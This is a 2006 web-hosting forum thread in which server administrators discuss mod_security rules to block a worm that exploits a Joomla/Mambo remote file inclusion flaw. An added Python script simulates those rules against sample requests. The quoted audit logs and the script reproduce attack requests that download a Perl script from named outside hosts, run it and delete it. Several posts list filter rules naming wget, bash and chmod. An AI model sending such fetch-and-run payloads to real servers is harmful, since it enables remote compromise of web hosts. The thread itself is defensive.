#1 Member (Join Date: Oct 2004, Posts: 124)

need help with mod-security to prevent attacks from specific websites.

    Hi,

Mod-security is blocking a wave of attacks from different IPs trying to download malicious files from www.thriftysix.co.uk, www.freewebs.com and www.sporadical.org.

Blocking IPs does not work as the attackers keep on changing IPs, but the websites from where they are trying to download these tools remain the same. How do I blacklist these websites completely? I have a RHEL/cPanel server. Thanks for your help and advice.

    202.133.209.67 2006-02-11 05:48:42 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt;perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0 www.xxx.net Access denied with code 406. Pattern match "wget " at THE_REQUEST 406

    220.245.178.132 2006-02-11 05:46:47 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/sess2006/tool.gif?&cmd=cd%20/tmp/;GET%20http://freewebs.com/sess2006/sess3023_%20>%20sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*? HTTP/1.0 www.xxxx.net Access denied with code 406. Pattern match "Mozilla/(4|5)\\.0$" at HEADER("USER-AGENT") 406

    202.133.209.67 2006-02-11 05:44:37 /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sporadical.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.sporadical.org/xxd.txt;perl%20xxd.txt;rm%20-rf%20xxd.txt*? HTTP/1.0

#2 cPanel Partner NOC (Join Date: Nov 2003, Location: Moscow, Posts: 294)

It will be better if you just block wget, cd and other system commands.
BTW, you may just download the newest mod_security rules from the official modescurity.org site.
    https://robobill.net
    US dedicated, Europe and Asia and Russia dedicated server. Shared, Reseller, VPS hosting in US and Europe.
    We are RESELLER of dedicated servers since 2002.

#3 Member (Join Date: Oct 2004, Location: New Jersey, USA, Posts: 160)

    Block the type of attack.

    SecFilter "mosConfig_absolute_path" would even do it.

    Also, check around the forums for posts / threads by me with my rules, this one is in there long ago.

Unfortunately, since this is a worm and spreads itself using the servers it has infected, you can either ask your data center to drop traffic at the router for each IP, or sit it out and empty your audit_log once in a while.

But the main thing about this attack that can be squashed, regardless of what command they run (what if it's not wget?), is:

    SecFilter "mosConfig_absolute_path"
    -Kris
    HostMerit
    'Web Hosting on Your Terms'

#4 Member verdon (Join Date: Nov 2003, Location: Northern Ontario, Canada, Posts: 792)

    Quote Originally Posted by HostMerit
    ...empty your audit_log, once in a while
I added my audit_log to logrotate... that helps.

#5 Member (Join Date: Oct 2004, Posts: 124)

    Kris,

The reason mod-security has been blocking these attacks is that I have been using your rules.

Do you have a 'rule' to blacklist some websites completely, to prevent any scripts being downloaded/run from there, as an added precaution?

    Thanks for your help!

    # Added Jan 20 by kris from honeypot domlogs - Brand new Rootkits etc
    SecFilter "mosConfig_absolute_path"
    SecFilterSelective THE_REQUEST "tool\.gif"
    SecFilterSelective THE_REQUEST "tool25\.txt"
    SecFilter "perl\x20xx\.txt"
    SecFilter "sweet-serenity\.org"
    SecFilterSelective THE_REQUEST "sess3025"
    SecFilter "mosConfig_absolute_path=http"
    SecFilter "echo\x20YYY"
    SecFilter "cmd\.gif?"
    SecFilter "\x20bash;"
    SecFilter "200\.72\.130\.29"
    SecFilter "200\.207\.91\.25"
    SecFilter "62\.23\.221\.67"
    SecFilter "147\.142\.142\.24"
    SecFilter "202\.143\.140\.151"
    SecFilterSelective THE_REQUEST "killop"
    SecFilterSelective THE_REQUEST "\/bash;chmod"

#6 Member (Join Date: Nov 2005, Posts: 125)

Just about the link... It is http://modsecurity.org, just in case no one knew...

Find the attacker's hostname (palmer.comcast.net) and try to block that with iptables or something.

#7 Member (Join Date: Oct 2004, Location: New Jersey, USA, Posts: 160)

It's a rootkit that's spread, so if anything, you'd block the website it's accessing. Since it spreads rapidly there is no way of knowing the possible attacking IPs, but if they only use a pool of 5-6 websites (sporadical.org, etc.) it's easy to block them.

Glad to get some thanks for my security rules.

This would even work, but I haven't tried it as it (MIGHT) block some legitimate items.

    SecFilter "cmd=cd"
    Last edited by HostMerit; 02-15-2006 at 12:33 PM. Reason: thought of easy blocking rule
    -Kris
    HostMerit
    'Web Hosting on Your Terms'
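To show why Kris's generic "mosConfig_absolute_path" rule (post #3) catches every variant of this worm while "wget" misses the GET-based one, and why the "cmd=cd" shortcut from post #7 can hit legitimate requests, here is a small added Python simulation that is not part of the thread or of mod_security itself. It emulates SecFilter matching as a URL-decoded regex search over the request line (a simplification of mod_security 1.x behaviour, assumed here) and runs it over constructed copies of the three request lines from the opening post plus one constructed benign request.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines, modelled on the three audit-log entries
# in the opening post (same URLs; GET method and HTTP/1.0 assumed).
SAMPLE_REQUESTS = [
    "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt;perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0",
    "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/sess2006/tool.gif?&cmd=cd%20/tmp/;GET%20http://freewebs.com/sess2006/sess3023_%20>%20sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*? HTTP/1.0",
    "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sporadical.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.sporadical.org/xxd.txt;perl%20xxd.txt;rm%20-rf%20xxd.txt*? HTTP/1.0",
]

# Constructed benign request: a shop search whose "cmd" parameter happens to
# start with "cd", which the "cmd=cd" rule cannot tell apart from the worm.
LEGITIMATE_REQUEST = "GET /shop/index.php?cmd=cd-player&page=2 HTTP/1.0"

# (directive, location, regex) triples, in the order mod_security would try them.
# Locations are ignored in this simplified emulation: every rule is applied to
# the URL-decoded request line.
RULES = [
    ("SecFilter", None, r"mosConfig_absolute_path"),           # Kris's generic rule (post #3)
    ("SecFilter", None, r"wget "),                             # rule that fired in the OP's log
    ("SecFilterSelective", "THE_REQUEST", r"tool25\.txt"),     # payload-specific rule from the list
    ("SecFilter", None, r"cmd=cd"),                            # tentative rule from post #7
]


def matching_rules(request_line, rules=RULES):
    """Return the patterns (in rule order) that would deny this request line."""
    decoded = unquote(request_line)  # %20 -> space etc., as mod_security normalises
    return [pattern for _, _, pattern in rules if re.search(pattern, decoded)]


def rule_hit_counts(requests, rules=RULES):
    """Count, per pattern, how many of the given requests each rule would catch."""
    counts = {pattern: 0 for _, _, pattern in rules}
    for line in requests:
        for pattern in matching_rules(line, rules):
            counts[pattern] += 1
    return counts


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print("worm request denied by:", matching_rules(line))
    print("benign request denied by:", matching_rules(LEGITIMATE_REQUEST))
    print("coverage over the worm samples:", rule_hit_counts(SAMPLE_REQUESTS))
```

The second sample (the freewebs.com variant) uses GET instead of wget, so only the generic and the cmd=cd rules see it; the benign request trips cmd=cd alone, which is the false positive Kris was wary of.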
